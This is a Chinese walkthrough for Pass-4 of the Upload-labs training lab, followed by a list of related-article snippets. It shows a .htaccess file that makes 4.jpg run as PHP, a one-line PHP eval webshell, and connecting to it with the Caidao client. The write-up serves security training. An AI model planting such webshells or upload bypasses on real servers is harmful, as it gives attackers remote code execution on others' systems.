第四关在后端使用了黑名单,并过滤了空格,点,以及大小写 , 但未过滤 .htaccess(分布式配置) , 固此关卡使用 分布式配置文件绕过黑名单

准备一个 .htaccess 文件 , 内容如下

<FilesMatch "4.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

准备一个 4.jpg 文件 , 内容为一句话木马

<?php eval($_POST[-7]);?>

先上传 .htaccess 文件 , 该文件可使其所在目录下的所有文件以php文件执行

再上传 4.jpg 文件 , 此文件会被当做php文件执行

右键 复制文件路径 , 并使用菜刀链接

​​​​​​​​​​​​​​

链接成功

Upload LABS Pass-4相关推荐

  1. Upload labs

    Pass -01(js检查) 题目基于前端js过滤,只能上传图片格式的文件,所以我们用一句话木马,改后缀上传后,用burp抓包,修改文件后缀为php,然后用蚁剑连接, 注意: 文件没有上传在具体题目中 ...

  2. (白帽子学习笔记)前渗透——文件上传upload labs

    读者需知 1.本文仅供学习使用,由于传播和利用此文所造成的损失均由使用者本人负责,文章作者不为此承担责任 2.本文参考了一些文章,如有侵权请联系本人删除 第一关--前端验证 1.将浏览器中的JS代码禁 ...

  3. upload -labs通关解析及上传类型总结和思考

    Pass-01(客户端JS绕过) 客户端JS判断方法:上传一个php文件,用bp抓包,如果没抓到包就弹框说不能上传,就说明是客户端JS检测 客户端JS绕过方法: 方法一: 上传一个图片马格式为jpg, ...

  4. Upload LABS Pass-11

    第十一关在服务端使用了白名单 , 但文件保存路径外漏 , 可以使用00截断 准备一个 11.php 文件 , 内容为一句话木马 <?php eval($_POST[-7]);?> 上传 1 ...

  5. Upload LABS Pass-10

    第十关在后端使用了黑名单 , 将匹配到的后缀名替换为空,使文件不能使用 , 但其只过滤了一遍 , 我们可以使用双写后缀名的方式绕过黑名单 准备一个 10.pphphp 文件 , 内容为一句话木马 &l ...

  6. Upload LABS Pass-9

    第九关在后端使用了黑名单,并过滤了大小写,空格,点以及数据流 , 但未对文件重命名并且只过滤了一遍点和空格 , 我们在文件后缀名添加 点空格点 , 来绕过黑名单 准备一个 9.php 文件 , 内容为 ...

  7. Upload LABS Pass-8

    第八关在后端使用了黑名单 , 并过滤了大小写,点以及空格 , 但并未过滤数据流 , 我们使用代理拦截请求,在文件后缀名中添加数据流,绕过黑名单 准备一个 8.php 文件 , 内容为一句话木马 < ...

  8. Upload LABS Pass-7

    第七关在后端使用了黑名单 , 并过滤了大小写,空格 , 但未过滤点 , 我们使用代理拦截请求,将后缀名添加点. , 来绕过黑名单 准备一个 7.php 文件 , 内容为一句话木马 <?php e ...

  9. Upload LABS Pass-6

    第六关在后端使用了黑名单 , 并过滤了大小写和点 , 但未过滤空格 , 我们使用代理抓包在后缀名中添加空格,即可绕过黑名单 准备一个 6.php 文件 , 内容为一句话木马 <?php eval ...

  10. Upload LABS Pass-5

    第五关在后端使用了黑名单 , 并过滤了空格,点 , 但未过滤大小写 , 我们修改文件后缀大小写来绕过黑名单 准备一个 5.PHP 文件 , 内容为一句话木马 <?php eval($_POST[ ...

最新文章

  1. VirtualBox 启动时提示“获取 VirtualBox COM 对象失败”的解决
  2. C/C++ Development Library
  3. JAVA——读取文本文件的倒数第N行(模拟Linux中tail命令)
  4. Asp.net(C#)-显示所有缓存 清除所有缓存
  5. 不安装cudnn可不可以_Linux非root用户如何优雅的安装cuda和cudnn
  6. 现在抖音这么火,那么你知道如何用CSS实现抖音字体?
  7. c语言 socket 报文解析,C语言实现Socket简单通信
  8. 信息学奥赛一本通 1023:Hello,World!的大小 | OpenJudge NOI 1.2 10
  9. EasyARM-iMX283A的Linux 开发环境构建
  10. 使用Gitblit 在windows 上部署你的Git Server
  11. 电气防火限流式保护器应用场景及选型指南
  12. visio流程图怎么合并线_visio图形怎么合并? visio合并图形的方法
  13. 怎么把度分秒化成小数_excel中批量将经纬度度分秒转换成十进制小数点的方法介绍...
  14. linux开发之deamon的写法
  15. SurfacePro6解决亮度自动调节问题
  16. Spring注解@Value在controller无法获取到值
  17. [Error Msg] The root link_base has an inertia specified in the URDF, but KDL does not support ...
  18. Linux服务器间传文件SCP命令使用方法
  19. 常用的社会信息公开查询
  20. Java选择题(十七)

热门文章

  1. 9.11两点间距离(1636050091)
  2. Java集合Set、Map、HashSet、HashMap、TreeSet、TreeMap等
  3. routeChangeSuccess
  4. BCB 连接数据库和查询数据
  5. UDP --01--基本开发设计
  6. 设置、获得对话框中 编辑框控件 EDIT 的内容
  7. 大数据之-Hadoop3.x_MapReduce_MapJoin案例完成---大数据之hadoop3.x工作笔记0134
  8. AndroidStudio_安卓原生开发_v4v7升级到androidx方法---Android原生开发工作笔记147
  9. Android_Kotlin原生开发_认识Kotlin_了解Kotlin和JVM虚拟机关系_认识Kotlin的重要性_更强大的跨平台特性_不需要JVM虚拟机也可跨平台---Kotlin工作笔记001
  10. Vue计算属性的_set与get方法_实现双向数据传递---vue工作笔记0006